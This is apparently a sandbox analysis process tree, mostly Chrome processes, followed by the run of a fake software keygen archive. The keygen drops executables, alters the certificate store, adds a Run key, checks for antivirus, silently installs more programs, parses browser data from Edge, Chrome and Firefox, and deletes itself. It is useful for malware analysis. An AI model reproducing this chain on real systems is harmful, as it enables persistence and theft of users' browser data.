  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3700 /prefetch:1
  2⤵
  PID:1004
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4200 /prefetch:8
  2⤵
  PID:2528
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4380 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3920
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5184 /prefetch:8
  2⤵
  PID:4564
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4620 /prefetch:8
  2⤵
  PID:1824
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4844 /prefetch:8
  2⤵
  PID:4652
- C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe
  "C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --force-configure-user-settings
  2⤵
  PID:4656
- - C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe
    "C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0x23c,0x240,0x244,0x21c,0x248,0x7ff7e84f7740,0x7ff7e84f7750,0x7ff7e84f7760
    3⤵
    PID:4540
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4884 /prefetch:8
  2⤵
  PID:4208
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4180 /prefetch:8
  2⤵
  PID:2388
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5052 /prefetch:8
  2⤵
  PID:3036
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4880 /prefetch:8
  2⤵
  PID:2788
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5196 /prefetch:8
  2⤵
  PID:2164
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5028 /prefetch:8
  2⤵
  PID:5100
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5108 /prefetch:8
  2⤵
  PID:360
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4572 /prefetch:8
  2⤵
  PID:3792
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5332 /prefetch:8
  2⤵
  PID:4240
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5040 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4536
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4680 /prefetch:8
  2⤵
  PID:2196
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5024 /prefetch:8
  2⤵
  PID:4592
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5560 /prefetch:8
  2⤵
  PID:3912
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4720 /prefetch:8
  2⤵
  PID:2272
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6152 /prefetch:8
  2⤵
  PID:4640
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5848 /prefetch:8
  2⤵
  PID:208
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6360 /prefetch:8
  2⤵
  PID:4200
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6484 /prefetch:8
  2⤵
  PID:2932
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5948 /prefetch:8
  2⤵
  PID:4892
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4288 /prefetch:1
  2⤵
  PID:3136
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5252 /prefetch:8
  2⤵
  PID:4048
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6752 /prefetch:8
  2⤵
  PID:3804
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6996 /prefetch:8
  2⤵
  PID:2084
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6988 /prefetch:8
  2⤵
  PID:4660
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5656 /prefetch:8
  2⤵
  PID:1180
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5532 /prefetch:8
  2⤵
  PID:4072
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7192 /prefetch:8
  2⤵
  PID:4608
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6344 /prefetch:8
  2⤵
  PID:3796
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6972 /prefetch:1
  2⤵
  PID:4636
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6312 /prefetch:8
  2⤵
  PID:4556
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7164 /prefetch:8
  2⤵
  PID:2220
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5276 /prefetch:8
  2⤵
  PID:3164
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3528 /prefetch:8
  2⤵
  PID:4408
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6780 /prefetch:1
  2⤵
  PID:4200
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7220 /prefetch:8
  2⤵
  PID:2808
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7216 /prefetch:8
  2⤵
  PID:2084
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6168 /prefetch:8
  2⤵
  PID:2888
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6508 /prefetch:8
  2⤵
  PID:4208
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7164 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3036
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7316 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4740
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5060 /prefetch:1
  2⤵
  PID:4640
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7156 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:796
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6080 /prefetch:8
  2⤵
  PID:2080
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5488 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4592
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3316 /prefetch:8
  2⤵
  PID:3776
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3932 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1436
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3924 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:364
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4848 /prefetch:8
  2⤵
  PID:848
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5404 /prefetch:8
  2⤵
  PID:4844
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2204 /prefetch:8
  2⤵
  PID:4432

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1832

C:\Windows\system32\msinfo32.exe
"C:\Windows\system32\msinfo32.exe" "C:\Users\Admin\AppData\Local\Temp\Temp2_Fx_Sound_Enhancer_13_keygen_by_KeygenNinja.zip\KeygenNinja.nfo"
1⤵
- Checks SCSI registry key(s)
- Enumerates system info in registry
- Suspicious behavior: GetForegroundWindowSpam
PID:2352

C:\Windows\system32\msinfo32.exe
"C:\Windows\system32\msinfo32.exe" "C:\Users\Admin\AppData\Local\Temp\Temp2_Fx_Sound_Enhancer_13_keygen_by_KeygenNinja.zip\KeygenNinja.nfo"
1⤵
- Checks SCSI registry key(s)
- Enumerates system info in registry
PID:4668

C:\Users\Admin\AppData\Local\Temp\Temp2_Fx_Sound_Enhancer_13_keygen_by_KeygenNinja.zip\Fx_Sound_Enhancer_13_keygen_by_KeygenNinja.exe
"C:\Users\Admin\AppData\Local\Temp\Temp2_Fx_Sound_Enhancer_13_keygen_by_KeygenNinja.zip\Fx_Sound_Enhancer_13_keygen_by_KeygenNinja.exe"
1⤵
PID:4516
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
  2⤵
  PID:4108
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
    keygen-pr.exe -p83fsase3Ge
    3⤵
    - Executes dropped EXE
    PID:4780
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe"
      4⤵
      Executes dropped EXE
      PID:4856
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe -txt -scanlocal -file:potato.dat
        5⤵
        
        PID:796
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe
    keygen-step-2.exe
    3⤵
    - Executes dropped EXE
    - Modifies system certificate store
    PID:3960
  - - C:\Users\Admin\AppData\Roaming\FD3D.tmp.exe
      "C:\Users\Admin\AppData\Roaming\FD3D.tmp.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1832
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\FD3D.tmp.exe"
        5⤵
        
        PID:2828
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout /T 10 /NOBREAK
        6⤵
        Delays execution with timeout.exe
        
        PID:632
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe" >> NUL
      4⤵
      PID:2768
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1
        5⤵
        Runs ping.exe
        
        PID:3904
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
    keygen-step-1.exe
    3⤵
    - Executes dropped EXE
    PID:3556
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
    keygen-step-3.exe
    3⤵
    - Executes dropped EXE
    PID:2788
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
      4⤵
      PID:2784
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping 1.1.1.1 -n 1 -w 3000
        5⤵
        Runs ping.exe
        
        PID:1436
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
    keygen-step-4.exe
    3⤵
    - Executes dropped EXE
    PID:4644
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:4036
    - - C:\Users\Admin\AppData\Local\Temp\2JG3OIROEB\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2JG3OIROEB\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
        5⤵
        Executes dropped EXE
        Drops file in Windows directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:2516
      - C:\Users\Admin\AppData\Local\Temp\2JG3OIROEB\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2JG3OIROEB\multitimer.exe" 1 3.1616869295.605f77af35bb3 101
        6⤵
        Executes dropped EXE
        Adds Run key to start application
        
        PID:1596
        
        C:\Users\Admin\AppData\Local\Temp\2JG3OIROEB\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2JG3OIROEB\multitimer.exe" 2 3.1616869295.605f77af35bb3
        7⤵
        Executes dropped EXE
        Checks for any installed AV software in registry
        Maps connected drives based on registry
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2832
        
        C:\Users\Admin\AppData\Local\Temp\ctohh5g3bux\e2c4myx2qb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ctohh5g3bux\e2c4myx2qb2.exe" /VERYSILENT
        8⤵
        Executes dropped EXE
        
        PID:4788
        
        C:\Users\Admin\AppData\Local\Temp\is-DGMJ9.tmp\e2c4myx2qb2.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-DGMJ9.tmp\e2c4myx2qb2.tmp" /SL5="$103C0,2592217,780800,C:\Users\Admin\AppData\Local\Temp\ctohh5g3bux\e2c4myx2qb2.exe" /VERYSILENT
        9⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Program Files directory
        Suspicious use of FindShellTrayWindow
        
        PID:5184
        
        C:\Users\Admin\AppData\Local\Temp\is-D9K2M.tmp\winlthsth.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-D9K2M.tmp\winlthsth.exe"
        10⤵
        Executes dropped EXE
        
        PID:5520
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5520 -s 700
        11⤵
        Program crash
        
        PID:5400
        
        C:\Users\Admin\AppData\Local\Temp\zcedyzfbihh\vict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\zcedyzfbihh\vict.exe" /VERYSILENT /id=535
        8⤵
        Executes dropped EXE
        
        PID:1112
        
        C:\Users\Admin\AppData\Local\Temp\is-LAM3M.tmp\vict.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-LAM3M.tmp\vict.tmp" /SL5="$303BC,870426,780800,C:\Users\Admin\AppData\Local\Temp\zcedyzfbihh\vict.exe" /VERYSILENT /id=535
        9⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Program Files directory
        Suspicious use of FindShellTrayWindow
        
        PID:5272
        
        C:\Users\Admin\AppData\Local\Temp\is-JFUDP.tmp\winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-JFUDP.tmp\winhost.exe" 535
        10⤵
        Executes dropped EXE
        
        PID:5148
        
        C:\Users\Admin\AppData\Local\Temp\3yn4an0reau\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3yn4an0reau\Setup3310.exe" /Verysilent /subid=577
        8⤵
        Executes dropped EXE
        
        PID:4824
        
        C:\Users\Admin\AppData\Local\Temp\is-RUSB9.tmp\Setup3310.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-RUSB9.tmp\Setup3310.tmp" /SL5="$203AA,138429,56832,C:\Users\Admin\AppData\Local\Temp\3yn4an0reau\Setup3310.exe" /Verysilent /subid=577
        9⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of FindShellTrayWindow
        
        PID:5152
        
        C:\Users\Admin\AppData\Local\Temp\is-OQ5AV.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-OQ5AV.tmp\Setup.exe" /Verysilent
        10⤵
        
        PID:5644
        
        C:\Program Files (x86)\VR\Versium Research\customer5.exe
        
        "C:\Program Files (x86)\VR\Versium Research\customer5.exe"
        11⤵
        
        PID:3276
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe"
        12⤵
        
        PID:1376
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX3\parse.exe
        
        parse.exe -f json -b edge
        13⤵
        
        PID:5324
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX3\parse.exe
        
        parse.exe -f json -b chrome
        13⤵
        
        PID:4004
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX3\parse.exe
        
        parse.exe -f json -b firefox
        13⤵
        
        PID:3920
        
        C:\Program Files (x86)\VR\Versium Research\RunWW.exe
        
        "C:\Program Files (x86)\VR\Versium Research\RunWW.exe"
        11⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5196
        
        C:\Windows\SysWOW64\cmd.exe
        
